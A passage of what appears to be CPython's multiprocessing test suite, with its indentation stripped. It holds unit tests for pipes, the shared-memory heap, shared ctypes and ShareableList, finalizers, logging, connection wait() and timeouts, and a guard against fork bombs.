# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaises(ValueError):
sl[4] = 'far too many' # Exceeds available storage.
self.assertEqual(sl[4], 'some')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + 60
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
if "multiprocessing.__init__" in modules:
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
if 'multiprocessing.popen_fork' in modules:
modules.remove('multiprocessing.popen_fork')
if 'multiprocessing.popen_forkserver' in modules:
modules.remove('multiprocessing.popen_forkserver')
if 'multiprocessing.popen_spawn_posix' in modules:
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((test.support.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
